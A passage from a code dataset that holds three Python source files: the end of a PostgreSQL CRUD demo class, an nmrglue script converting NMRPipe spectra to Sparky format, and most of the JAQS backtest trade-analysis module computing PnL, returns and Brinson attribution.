except Exception as err:
print("can not connect to the database,%s" % err)
return conn
def query_all(self):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1"
try:
cur = conn.cursor()
cur.execute(sql)
res = cur.fetchall()
# print(res)
print("id\tname\tgender\ttime")
for d in res:
print("%d\t%s\t%s\t%s" % (d[0], d[1], "male" if d[2] == 1 else "female", self.timestamp2datetime(d[3], False)))
except Exception as err:
print("query all fail, %s" % err)
finally:
cur.close()
def query_lastone(self):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1 order by create_time desc limit 1"
try:
cur = conn.cursor()
cur.execute(sql)
res = cur.fetchone()
# print(res)
print("id\tname\tgender\ttime")
print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
except Exception as err:
print("query lastone fail, %s" % err)
finally:
cur.close()
def query_byname(self, name):
with self.getConnection() as conn:
sql = "select id, name, gender, create_time from t1 where name = %s"
try:
cur = conn.cursor()
cur.execute(sql, (name, ))
res = cur.fetchone()
# print(res)
print("id\tname\tgender\ttime")
print("%d\t%s\t%s\t%s" % (res[0], res[1], "male" if res[2] == 1 else "female", self.timestamp2datetime(res[3], False)))
except Exception as err:
print("query by name fail, %s" % err)
finally:
cur.close()
def insert_one(self, name, gender):
with self.getConnection() as conn:
sql = " insert into t1(name, gender, create_time) values(%s, %s, %s) "
try:
cur = conn.cursor()
cur.execute(sql, (name, gender, self.getCurrentTimestamp()))
print("insert ok")
except Exception as err:
print("insert one fail, %s" % err)
finally:
cur.close()
def update_genderbyid(self, id, gender):
with self.getConnection() as conn:
sql = " update t1 set gender = %s where id = %s "
try:
cur = conn.cursor()
cur.execute(sql, (gender, id))
print("update ok")
except Exception as err:
print("update gender by id fail, %s" % err)
finally:
cur.close()
def delete_byname(self, name):
with self.getConnection() as conn:
sql = " delete from t1 where name = %s "
try:
cur = conn.cursor()
cur.execute(sql, (name, ))
print("delete ok")
except Exception as err:
print("delete by name fail, %s" % err)
finally:
cur.close()
def getCurrentTimestamp(self):
ts = int ( round ( time.time() * 1000 ) )
print(ts)
return ts
def timestamp2datetime(self, timestamp, issecond):
if(issecond == True):
t = datetime.datetime.fromtimestamp(timestamp)
return t.strftime("%Y-%m-%d %H:%M:%S")
else:
t = datetime.datetime.fromtimestamp(timestamp / 1000)
return t.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
if __name__ == "__main__":
pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
print("===========insert_one==============")
pg.insert_one("wong", 1)
print("===========query_all==============")
pg.query_all()
print("===========query_lastone==============")
pg.query_lastone()
print("===========query_byname==============")
pg.query_byname("catcher")
print("===========update_genderbyid==============")
pg.update_genderbyid(4, 2)
print("===========delete_byname==============")
pg.delete_byname("wong")
print("===========query_all==============")
pg.query_all()
| 2.9375 | 3 |
examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 1 | 11350 | #! /usr/bin/env python
import nmrglue as ng
# read in the varian data
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")
# Set the parameters
u = ng.pipe.guess_udic(dic,data)
# create the converter object and initilize with varian data
C = ng.convert.converter()
C.from_pipe(dic,data,u)
# create pipe data and then write it out
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)
# check the conversion against NMRPipe
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
| 2.4375 | 2 |
jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | 0 | 11351 | # encoding: utf-8
from __future__ import print_function
import os
import json
from collections import OrderedDict
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import Formatter
from jaqs.trade.analyze.report import Report
from jaqs.data import RemoteDataService
from jaqs.data.basic.instrument import InstManager
from jaqs.trade import common
import jaqs.util as jutil
STATIC_FOLDER = jutil.join_relative_path("trade/analyze/static")
TO_PCT = 100.0
MPL_RCPARAMS = {'figure.facecolor': '#F6F6F6',
'axes.facecolor': '#F6F6F6',
'axes.edgecolor': '#D3D3D3',
'text.color': '#555555',
'grid.color': '#B1B1B1',
'grid.alpha': 0.3,
# scale
'axes.linewidth': 2.0,
'axes.titlepad': 12,
'grid.linewidth': 1.0,
'grid.linestyle': '-',
# font size
'font.size': 13,
'axes.titlesize': 18,
'axes.labelsize': 14,
'legend.fontsize': 'small',
'lines.linewidth': 2.5,
}
class TradeRecordEmptyError(Exception):
def __init__(self, *args):
super(TradeRecordEmptyError, self).__init__(*args)
class MyFormatter(Formatter):
def __init__(self, dates, fmt='%Y%m'):
self.dates = dates
self.fmt = fmt
def __call__(self, x, pos=0):
"""Return the label for time x at position pos"""
ind = int(np.round(x))
if ind >= len(self.dates) or ind < 0:
return ''
# return self.dates[ind].strftime(self.fmt)
return pd.to_datetime(self.dates[ind], format="%Y%m%d").strftime(self.fmt)
class BaseAnalyzer(object):
"""
Attributes
----------
_trades : pd.DataFrame
_configs : dict
data_api : BaseDataServer
_universe : set
All securities that have been traded.
"""
def __init__(self):
self.file_folder = ""
self._trades = None
self._configs = None
self.data_api = None
self.dataview = None
self._universe = []
self._closes = None
self._closes_adj = None
self.daily_position = None
self.adjust_mode = None
self.inst_map = dict()
self.performance_metrics = dict()
self.risk_metrics = dict()
self.report_dic = dict()
@property
def trades(self):
"""Read-only attribute"""
return self._trades
@property
def universe(self):
"""Read-only attribute"""
return self._universe
@property
def configs(self):
"""Read-only attribute"""
return self._configs
@property
def closes(self):
"""Read-only attribute, close prices of securities in the universe"""
return self._closes
@property
def closes_adj(self):
"""Read-only attribute, close prices of securities in the universe"""
return self._closes_adj
def initialize(self, data_api=None, dataview=None, file_folder='.'):
"""
Read trades from csv file to DataFrame of given data type.
Parameters
----------
data_api : RemoteDataService
dataview : DataView
file_folder : str
Directory path where trades and configs are stored.
"""
self.data_api = data_api
self.dataview = dataview
type_map = {'task_id': str,
'entrust_no': str,
'entrust_action': str,
'symbol': str,
'fill_price': float,
'fill_size': float,
'fill_date': np.integer,
'fill_time': np.integer,
'fill_no': str,
'commission': float}
abs_path = os.path.abspath(file_folder)
self.file_folder = abs_path
trades = pd.read_csv(os.path.join(self.file_folder, 'trades.csv'), ',', dtype=type_map)
if trades.empty:
raise TradeRecordEmptyError("No trade records found in your 'trades.csv' file. Analysis stopped.")
self._init_universe(trades.loc[:, 'symbol'].values)
self._init_configs(self.file_folder)
self._init_trades(trades)
self._init_symbol_price()
self._init_inst_data()
def _init_inst_data(self):
symbol_str = ','.join(self.universe)
if self.dataview is not None:
data_inst = self.dataview.data_inst
self.inst_map = data_inst.to_dict(orient='index')
elif self.data_api is not None:
inst_mgr = InstManager(data_api=self.data_api, symbol=symbol_str)
self.inst_map = {k: v.__dict__ for k, v in inst_mgr.inst_map.items()}
del inst_mgr
else:
raise ValueError("no dataview or dataapi provided.")
def _init_trades(self, df):
"""Add datetime column. """
df.loc[:, 'fill_dt'] = jutil.combine_date_time(df.loc[:, 'fill_date'], df.loc[:, 'fill_time'])
df = df.set_index(['symbol', 'fill_dt']).sort_index(axis=0)
# self._trades = jutil.group_df_to_dict(df, by='symbol')
self._trades = df
def _init_symbol_price(self):
"""Get close price of securities in the universe from data server."""
if self.dataview is not None:
df_close = self.dataview.get_ts('close', start_date=self.start_date, end_date=self.end_date)
df_close_adj = self.dataview.get_ts('close_adj', start_date=self.start_date, end_date=self.end_date)
else:
df, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
start_date=self.start_date, end_date=self.end_date)
if msg != '0,':
print(msg)
df_close = df.pivot(index='trade_date', columns='symbol', values='close')
df_adj, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
start_date=self.start_date, end_date=self.end_date)
if msg != '0,':
print(msg)
df_close_adj = df_adj.pivot(index='trade_date', columns='symbol', values='close')
self._closes = df_close
self._closes_adj = df_close_adj
def _init_universe(self, securities):
"""Return a set of securities."""
self._universe = set(securities)
def _init_configs(self, folder):
import codecs
with codecs.open(os.path.join(folder, 'configs.json'), 'r', encoding='utf-8') as f:
configs = json.load(f)
self._configs = configs
self.init_balance = self.configs['init_balance']
self.start_date = self.configs['start_date']
self.end_date = self.configs['end_date']
@staticmethod
def _process_trades(df):
"""Add various statistics to trades DataFrame."""
from jaqs.trade import common
# df = df.set_index('fill_date')
# pre-process
cols_to_drop = ['task_id', 'entrust_no', 'fill_no']
df = df.drop(cols_to_drop, axis=1)
def _apply(gp_df):
# calculation of non-cumulative fields
direction = gp_df['entrust_action'].apply(lambda s: 1 if common.ORDER_ACTION.is_positive(s) else -1)
fill_size, fill_price = gp_df['fill_size'], gp_df['fill_price']
turnover = fill_size * fill_price
gp_df.loc[:, 'BuyVolume'] = (direction + 1) / 2 * fill_size
gp_df.loc[:, 'SellVolume'] = (direction - 1) / -2 * fill_size
# Calculation of cumulative fields
gp_df.loc[:, 'CumVolume'] = fill_size.cumsum()
gp_df.loc[:, 'CumTurnOver'] = turnover.cumsum()
gp_df.loc[:, 'CumNetTurnOver'] = (turnover * -direction).cumsum()
gp_df.loc[:, 'position'] = (fill_size * direction).cumsum()
gp_df.loc[:, 'AvgPosPrice'] = calc_avg_pos_price(gp_df.loc[:, 'position'].values, fill_price.values)
gp_df.loc[:, 'CumProfit'] = (gp_df.loc[:, 'CumNetTurnOver'] + gp_df.loc[:, 'position'] * fill_price)
return gp_df
gp = df.groupby(by='symbol')
res = gp.apply(_apply)
return res
def process_trades(self):
# self._trades = {k: self._process_trades(v) for k, v in self.trades.items()}
self._trades = self._process_trades(self._trades)
def get_pos_change_info(self):
trades = pd.concat(self.trades.values(), axis=0)
gp = trades.groupby(by=['fill_date'], as_index=False)
res = OrderedDict()
account = OrderedDict()
for date, df in gp:
df_mod = df.loc[:, ['symbol', 'entrust_action', 'fill_size', 'fill_price',
'position', 'AvgPosPrice']]
df_mod.columns = ['symbol', 'action', 'size', 'price',
'position', 'cost price']
res[str(date)] = df_mod
mv = sum(df_mod.loc[:, 'price'] * df.loc[:, 'position'])
current_profit = sum(df.loc[:, 'CumProfit'])
cash = self.configs['init_balance'] + current_profit - mv
account[str(date)] = {'market_value': mv, 'cash': cash}
self.position_change = res
self.account = account
def get_daily(self):
close = self.closes
trade = self.trades
# pro-process
trade_cols = ['fill_date', 'BuyVolume', 'SellVolume', 'commission', 'position', 'AvgPosPrice', 'CumNetTurnOver']
trade = trade.loc[:, trade_cols]
gp = trade.groupby(by=['symbol', 'fill_date'])
func_last = lambda ser: ser.iat[-1]
trade = gp.agg({'BuyVolume': np.sum, 'SellVolume': np.sum, 'commission': np.sum,
'position': func_last, 'AvgPosPrice': func_last, 'CumNetTurnOver': func_last})
trade.index.names = ['symbol', 'trade_date']
# get daily position
df_position = trade['position'].unstack('symbol').fillna(method='ffill').fillna(0.0)
daily_position = df_position.reindex(close.index)
daily_position = daily_position.fillna(method='ffill').fillna(0)
self.daily_position = daily_position
# calculate statistics
close = pd.DataFrame(close.T.stack())
close.columns = ['close']
close.index.names = ['symbol', 'trade_date']
merge = pd.concat([close, trade], axis=1, join='outer')
def _apply(gp_df):
cols_nan_to_zero = ['BuyVolume', 'SellVolume', 'commission']
cols_nan_fill = ['close', 'position', 'AvgPosPrice', 'CumNetTurnOver']
# merge: pd.DataFrame
gp_df.loc[:, cols_nan_fill] = gp_df.loc[:, cols_nan_fill].fillna(method='ffill')
gp_df.loc[:, cols_nan_fill] = gp_df.loc[:, cols_nan_fill].fillna(0)
gp_df.loc[:, cols_nan_to_zero] = gp_df.loc[:, cols_nan_to_zero].fillna(0)
mask = gp_df.loc[:, 'AvgPosPrice'] < 1e-5
gp_df.loc[mask, 'AvgPosPrice'] = gp_df.loc[mask, 'close']
gp_df.loc[:, 'CumProfit'] = gp_df.loc[:, 'CumNetTurnOver'] + gp_df.loc[:, 'position'] * gp_df.loc[:, 'close']
gp_df.loc[:, 'CumProfitComm'] = gp_df['CumProfit'] - gp_df['commission'].cumsum()
daily_net_turnover = gp_df['CumNetTurnOver'].diff(1).fillna(gp_df['CumNetTurnOver'].iat[0])
daily_position_change = gp_df['position'].diff(1).fillna(gp_df['position'].iat[0])
gp_df['trading_pnl'] = (daily_net_turnover + gp_df['close'] * daily_position_change)
gp_df['holding_pnl'] = (gp_df['close'].diff(1) * gp_df['position'].shift(1)).fillna(0.0)
gp_df.loc[:, 'total_pnl'] = gp_df['trading_pnl'] + gp_df['holding_pnl']
return gp_df
gp = merge.groupby(by='symbol')
res = gp.apply(_apply)
self.daily = res
'''
def get_daily(self):
"""Add various statistics to daily DataFrame."""
self.daily = self._get_daily(self.closes, self.trades)
daily_dic = dict()
for sec, df_trade in self.trades.items():
df_close = self.closes[sec].rename('close')
res = self._get_daily(df_close, df_trade)
daily_dic[sec] = res
self.daily = daily_dic
'''
def get_returns(self, compound_return=True, consider_commission=True):
cols = ['trading_pnl', 'holding_pnl', 'total_pnl', 'commission', 'CumProfitComm', 'CumProfit']
'''
dic_symbol = {sec: self.inst_map[sec]['multiplier'] * df_daily.loc[:, cols]
for sec, df_daily in self.daily.items()}
df_profit = pd.concat(dic_symbol, axis=1) # this is cumulative profit
df_profit = df_profit.fillna(method='ffill').fillna(0.0)
df_pnl = df_profit.stack(level=1)
df_pnl = df_pnl.sum(axis=1)
df_pnl = df_pnl.unstack(level=1)
'''
daily = self.daily.loc[:, cols]
daily = daily.stack().unstack('symbol')
df_pnl = daily.sum(axis=1)
df_pnl = df_pnl.unstack(level=1)
self.df_pnl = df_pnl
# TODO temperary solution
if consider_commission:
strategy_value = (df_pnl['total_pnl'] - df_pnl['commission']).cumsum() + self.init_balance
else:
strategy_value = df_pnl['total_pnl'].cumsum() + self.init_balance
market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill')
market_values.columns = ['strat', 'bench']
df_returns = market_values.pct_change(periods=1).fillna(0.0)
df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum')
if compound_return:
df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1
df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0)
else:
df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench']
df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0)
start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d")
end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d")
years = (end - start).days / 365.0
self.performance_metrics['Annual Return (%)'] =\
100 * (np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1)
self.performance_metrics['Annual Volatility (%)'] =\
100 * (df_returns.loc[:, 'active'].std() * np.sqrt(common.CALENDAR_CONST.TRADE_DAYS_PER_YEAR))
self.performance_metrics['Sharpe Ratio'] = (self.performance_metrics['Annual Return (%)']
/ self.performance_metrics['Annual Volatility (%)'])
self.risk_metrics['Beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1]
# bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date')
# df_returns = df_returns.join(bt_strat_mv, how='right')
self.returns = df_returns
def plot_pnl(self, save_folder=None):
old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()}
mpl.rcParams.update(MPL_RCPARAMS)
if save_folder is None:
save_folder = self.file_folder
fig1 = plot_portfolio_bench_pnl(self.returns.loc[:, 'strat_cum'],
self.returns.loc[:, 'bench_cum'],
self.returns.loc[:, 'active_cum'])
fig1.savefig(os.path.join(save_folder,'pnl_img.png'), facecolor=fig1.get_facecolor(), dpi=fig1.get_dpi())
fig2 = plot_daily_trading_holding_pnl(self.df_pnl['trading_pnl'],
self.df_pnl['holding_pnl'],
self.df_pnl['total_pnl'],
self.df_pnl['total_pnl'].cumsum())
fig2.savefig(os.path.join(save_folder,'pnl_img_trading_holding.png'), facecolor=fig2.get_facecolor(), dpi=fig2.get_dpi())
mpl.rcParams.update(old_mpl_rcparams)
def plot_pnl_OLD(self, save_folder=None):
if save_folder is None:
save_folder = self.file_folder
fig, (ax0, ax1, ax2) = plt.subplots(3, 1, figsize=(21, 8), dpi=300, sharex=True)
idx0 = self.returns.index
idx = np.arange(len(idx0))
bar_width = 0.3
ax0.bar(idx-bar_width/2, self.df_pnl['trading_pnl'], width=bar_width, color='indianred', label='Trading PnL',)
ax0.bar(idx+bar_width/2, self.df_pnl['holding_pnl'], width=bar_width, color='royalblue', label='Holding PnL')
ax0.axhline(0.0, color='k', lw=1, ls='--')
# ax0.plot(idx, self.pnl['total_pnl'], lw=1.5, color='violet', label='Total PnL')
ax0.legend(loc='upper left')
ax1.plot(idx, self.returns.loc[:, 'bench_cum'], label='Benchmark')
ax1.plot(idx, self.returns.loc[:, 'strat_cum'], label='Strategy')
ax1.legend(loc='upper left')
ax2.plot(idx, self.returns.loc[:, 'active_cum'], label='Extra Return')
ax2.legend(loc='upper left')
ax2.set_xlabel("Date")
ax2.set_ylabel("Net Value")
ax1.set_ylabel("Net Value")
ax2.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
plt.tight_layout()
fig.savefig(os.path.join(save_folder, 'pnl_img.png'))
plt.close()
def gen_report(self, source_dir, template_fn, out_folder='.', selected=None):
"""
Generate HTML (and PDF) report of the trade analysis.
Parameters
----------
source_dir : str
path of directory where HTML template and css files are stored.
template_fn : str
File name of HTML template.
out_folder : str
Output folder of report.
selected : list of str or None
List of symbols whose detailed PnL curve and position will be plotted.
# TODO: this parameter should not belong to function
"""
dic = dict()
dic['html_title'] = "Alpha Strategy Backtest Result"
dic['selected_securities'] = selected
# we do not want to show username / password in report
dic['props'] = {k: v for k, v in self.configs.items() if ('username' not in k and 'password' not in k)}
dic['performance_metrics'] = self.performance_metrics
dic['risk_metrics'] = self.risk_metrics
dic['position_change'] = self.position_change
dic['account'] = self.account
dic['df_daily'] = jutil.group_df_to_dict(self.daily, by='symbol')
dic['daily_position'] = self.daily_position
self.report_dic.update(dic)
self.returns.to_csv(os.path.join(out_folder, 'returns.csv'))
r = Report(self.report_dic, source_dir=source_dir, template_fn=template_fn, out_folder=out_folder)
r.generate_html()
r.output_html('report.html')
def do_analyze(self, result_dir, selected_sec=None):
if selected_sec is None:
selected_sec = []
print("process trades...")
self.process_trades()
print("get daily stats...")
self.get_daily()
print("calc strategy return...")
self.get_returns(consider_commission=False)
if len(selected_sec) > 0:
print("Plot single securities PnL")
for symbol in selected_sec:
df_daily = self.daily.loc[pd.IndexSlice[symbol, :], :]
df_daily.index = df_daily.index.droplevel(0)
if df_daily is not None:
plot_trades(df_daily, symbol=symbol, save_folder=self.file_folder)
print("Plot strategy PnL...")
self.plot_pnl(result_dir)
print("generate report...")
self.gen_report(source_dir=STATIC_FOLDER, template_fn='report_template.html',
out_folder=result_dir,
selected=selected_sec)
class EventAnalyzer(BaseAnalyzer):
def __init__(self):
super(EventAnalyzer, self).__init__()
self.metrics = dict()
self.daily = None
self.data_benchmark = None
self.returns = None # OrderedDict
self.position_change = None # OrderedDict
self.account = None # OrderedDict
def initialize(self, data_server_=None, dataview=None, file_folder='.'):
super(EventAnalyzer, self).initialize(data_api=data_server_, dataview=dataview,
file_folder=file_folder)
if self.dataview is not None and self.dataview.data_benchmark is not None:
self.data_benchmark = self.dataview.data_benchmark.loc[(self.dataview.data_benchmark.index >= self.start_date)
&(self.dataview.data_benchmark.index <= self.end_date)]
else:
benchmark = self.configs.get('benchmark', "")
if benchmark and data_server_:
df, msg = data_server_.daily(benchmark, start_date=self.closes.index[0], end_date=self.closes.index[-1])
self.data_benchmark = df.set_index('trade_date').loc[:, ['close']]
self.data_benchmark.columns = ['bench']
else:
self.data_benchmark = pd.DataFrame(index=self.closes.index, columns=['bench'], data=np.ones(len(self.closes), dtype=float))
class AlphaAnalyzer(BaseAnalyzer):
def __init__(self):
super(AlphaAnalyzer, self).__init__()
self.metrics = dict()
self.daily = None
self.returns = None # OrderedDict
self.position_change = None # OrderedDict
self.account = None # OrderedDict
self.df_brinson = None
self.data_benchmark = None
def initialize(self, data_api=None, dataview=None, file_folder='.'):
super(AlphaAnalyzer, self).initialize(data_api=data_api, dataview=dataview,
file_folder=file_folder)
if self.dataview is not None and self.dataview.data_benchmark is not None:
self.data_benchmark = self.dataview.data_benchmark.loc[(self.dataview.data_benchmark.index >= self.start_date)
&(self.dataview.data_benchmark.index <= self.end_date)]
@staticmethod
def _to_pct_return(arr, cumulative=False):
"""Convert portfolio value to portfolio (linear) return."""
r = np.empty_like(arr)
r[0] = 0.0
if cumulative:
r[1:] = arr[1:] / arr[0] - 1
else:
r[1:] = arr[1:] / arr[:-1] - 1
return r
'''
def get_returns_OLD(self, compound_return=True, consider_commission=True):
profit_col_name = 'CumProfitComm' if consider_commission else 'CumProfit'
vp_list = {sec: df_profit.loc[:, profit_col_name] for sec, df_profit in self.daily.items()}
df_profit = pd.concat(vp_list, axis=1) # this is cumulative profit
# TODO temperary solution
df_profit = df_profit.fillna(method='ffill').fillna(0.0)
strategy_value = df_profit.sum(axis=1) + self.configs['init_balance']
market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill')
market_values.columns = ['strat', 'bench']
df_returns = market_values.pct_change(periods=1).fillna(0.0)
df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum')
if compound_return:
df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1
df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0)
else:
df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench']
df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0)
start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d")
end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d")
years = (end - start).days / 365.0
self.metrics['yearly_return'] = np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1
self.metrics['yearly_vol'] = df_returns.loc[:, 'active'].std() * np.sqrt(225.)
self.metrics['beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1]
self.metrics['sharpe'] = self.metrics['yearly_return'] / self.metrics['yearly_vol']
# bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date')
# df_returns = df_returns.join(bt_strat_mv, how='right')
self.returns = df_returns
'''
def _get_index_weight(self):
if self.dataview is not None:
res = self.dataview.get_ts('index_weight', start_date=self.start_date, end_date=self.end_date)
else:
res = self.data_api.get_index_weights_daily(self.universe, self.start_date, self.end_date)
return res
def _brinson(self, close, pos, index_weight, group):
"""
Brinson Attribution.
Parameters
----------
close : pd.DataFrame
Index is date, columns are symbols.
pos : pd.DataFrame
Index is date, columns are symbols.
index_weight : pd.DataFrame
Index is date, columns are symbols.
group : pd.DataFrame
Index is date, columns are symbols.
Returns
-------
dict
"""
def group_sum(df, group_daily):
groups = np.unique(group_daily.values.flatten())
mask = np.isnan(groups.astype(float))
groups = groups[np.logical_not(mask)]
res = pd.DataFrame(index=df.index, columns=groups, data=np.nan)
for g in groups:
mask = group_daily == g
tmp = df[mask]
res.loc[:, g] = tmp.sum(axis=1)
return res
ret = close.pct_change(1)
pos_sum = pos.sum(axis=1)
pf_weight = pos.div(pos_sum, axis=0)
pf_weight.loc[pos_sum == 0, :] = 0.0
assert pf_weight.isnull().sum().sum() == 0
pf_weight = pf_weight.reindex(index=ret.index, columns=ret.columns)
pf_weight = pf_weight.fillna(0.0)
weighted_ret_pf = ret.mul(pf_weight)
weighted_ret_index = ret.mul(index_weight)
index_group_weight = group_sum(index_weight, group)
pf_group_weight = group_sum(pf_weight, group)
pf_group_ret = group_sum(weighted_ret_pf, group).div(pf_group_weight)
index_group_ret = group_sum(weighted_ret_index, group).div(index_group_weight)
allo_ret_group = (pf_group_weight - index_group_weight).mul(index_group_ret)
allo_ret = allo_ret_group.sum(axis=1)
selection_ret_group = (pf_group_ret - index_group_ret).mul(index_group_weight)
selection_ret = selection_ret_group.sum(axis=1)
active_ret = (weighted_ret_pf.sum(axis=1) - weighted_ret_index.sum(axis=1))
inter_ret = active_ret - selection_ret - allo_ret
df_brinson = pd.DataFrame(index=allo_ret.index,
data={'allocation': allo_ret,
'selection': selection_ret,
'interaction': inter_ret,
'total_active': active_ret})
return {'df_brinson': df_brinson, 'allocation': allo_ret_group, 'selection': selection_ret_group}
def brinson(self, group):
"""
Parameters
----------
group : str or pd.DataFrame
If group is string, this function will try to fetch the corresponding DataFrame from DataView.
If group is pd.DataFrame, it will be used as-is.
Returns
-------
"""
if isinstance(group, str):
group = self.dataview.get_ts(group, start_date=self.start_date, end_date=self.end_date)
elif isinstance(group, pd.DataFrame):
pass
else:
raise ValueError("Group must be string or DataFrame. But {} is provided.".format(group))
if group is None or group.empty:
raise ValueError("group is None or group is empty")
close = self.closes_adj
pos = self.daily_position
index_weight = self._get_index_weight()
res_dic = self._brinson(close, pos, index_weight, group)
df_brinson = res_dic['df_brinson']
self.df_brinson = df_brinson
self.report_dic['df_brinson'] = df_brinson
plot_brinson(df_brinson, save_folder=self.file_folder)
def do_analyze(self, result_dir, selected_sec=None, brinson_group=None):
if selected_sec is None:
selected_sec = []
print("process trades...")
self.process_trades()
print("get daily stats...")
self.get_daily()
print("calc strategy return...")
self.get_returns(consider_commission=False)
not_none_sec = []
if len(selected_sec) > 0:
print("Plot single securities PnL")
for symbol in selected_sec:
df_daily = self.daily.loc[pd.IndexSlice[symbol, :], :]
df_daily.index = df_daily.index.droplevel(0)
if df_daily is not None:
not_none_sec.append(symbol)
plot_trades(df_daily, symbol=symbol, save_folder=self.file_folder)
print("Plot strategy PnL...")
self.plot_pnl(result_dir)
if brinson_group is not None:
print("Do brinson attribution.")
group = self.dataview.get_ts(brinson_group)
if group is None:
raise ValueError("group data is None.")
self.brinson(group)
print("generate report...")
self.gen_report(source_dir=STATIC_FOLDER, template_fn='report_template.html',
out_folder=result_dir,
selected=not_none_sec)
def plot_daily_trading_holding_pnl(trading, holding, total, total_cum):
"""
Parameters
----------
Series
"""
idx0 = total.index
n = len(idx0)
idx = np.arange(n)
fig, (ax0, ax2, ax3) = plt.subplots(3, 1, figsize=(16, 13.5), sharex=True)
ax1 = ax0.twinx()
bar_width = 0.4
profit_color, lose_color = '#D63434', '#2DB635'
curve_color = '#174F67'
y_label = 'Profit / Loss ($)'
color_arr_raw = np.array([profit_color] * n)
color_arr = color_arr_raw.copy()
color_arr[total < 0] = lose_color
ax0.bar(idx, total, width=bar_width, color=color_arr)
ax0.set(title='Daily PnL', ylabel=y_label, xlim=[-2, n+2],)
ax0.xaxis.set_major_formatter(MyFormatter(idx0, '%y-%m-%d'))
ax1.plot(idx, total_cum, lw=1.5, color=curve_color)
ax1.set(ylabel='Cum. ' + y_label)
ax1.yaxis.label.set_color(curve_color)
color_arr = color_arr_raw.copy()
color_arr[trading < 0] = lose_color
ax2.bar(idx-bar_width/2, trading, width=bar_width, color=color_arr)
ax2.set(title='Daily Trading PnL', ylabel=y_label)
color_arr = color_arr_raw.copy()
color_arr[holding < 0] = lose_color
ax3.bar(idx+bar_width/2, holding, width=bar_width, color=color_arr)
ax3.set(title='Daily Holding PnL', ylabel=y_label, xticks=idx[: : n//10])
return fig
def plot_portfolio_bench_pnl(portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret):
"""
Parameters
----------
Series
"""
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 9), sharex=True)
idx_dt = portfolio_cum_ret.index
idx = np.arange(len(idx_dt))
y_label_ret = "Cumulative Return (%)"
ax1.plot(idx, (benchmark_cum_ret-1) * TO_PCT, label='Benchmark', color='#174F67')
ax1.plot(idx, (portfolio_cum_ret-1) * TO_PCT, label='Strategy', color='#198DD6')
ax1.legend(loc='upper left')
ax1.set(title="Absolute Return of Portfolio and Benchmark",
#xlabel="Date",
ylabel=y_label_ret)
ax1.grid(axis='y')
ax2.plot(idx, (excess_cum_ret-1) * TO_PCT, label='Extra Return', color='#C37051')
ax2.set(title="Excess Return Compared to Benchmark", ylabel=y_label_ret
#xlabel="Date",
)
ax2.grid(axis='y')
ax2.xaxis.set_major_formatter(MyFormatter(idx_dt, '%y-%m-%d')) # 17-09-31
fig.tight_layout()
return fig
def plot_brinson(df, save_folder):
"""
Parameters
----------
df : pd.DataFrame
"""
allo, selec, inter, total = df['allocation'], df['selection'], df['interaction'], df['total_active']
fig, ax1 = plt.subplots(1, 1, figsize=(21, 8))
idx0 = df.index
idx = range(len(idx0))
ax1.plot(idx, selec, lw=1.5, color='indianred', label='Selection Return')
ax1.plot(idx, allo, lw=1.5, color='royalblue', label='Allocation Return')
ax1.plot(idx, inter, lw=1.5, color='purple', label='Interaction Return')
# ax1.plot(idx, total, lw=1.5, ls='--', color='k', label='Total Active Return')
ax1.axhline(0.0, color='k', lw=0.5, ls='--')
ax1.legend(loc='upper left')
ax1.set_xlabel("Date")
ax1.set_ylabel("Return")
ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d'))
plt.tight_layout()
fig.savefig(os.path.join(save_folder, 'brinson_attribution.png'))
plt.close()
def calc_avg_pos_price(pos_arr, price_arr):
"""
Calculate average cost price using position and fill price.
When position = 0, cost price = symbol price.
"""
assert len(pos_arr) == len(price_arr)
avg_price = np.zeros_like(pos_arr, dtype=float)
avg_price[0] = price_arr[0]
for i in range(pos_arr.shape[0] - 1):
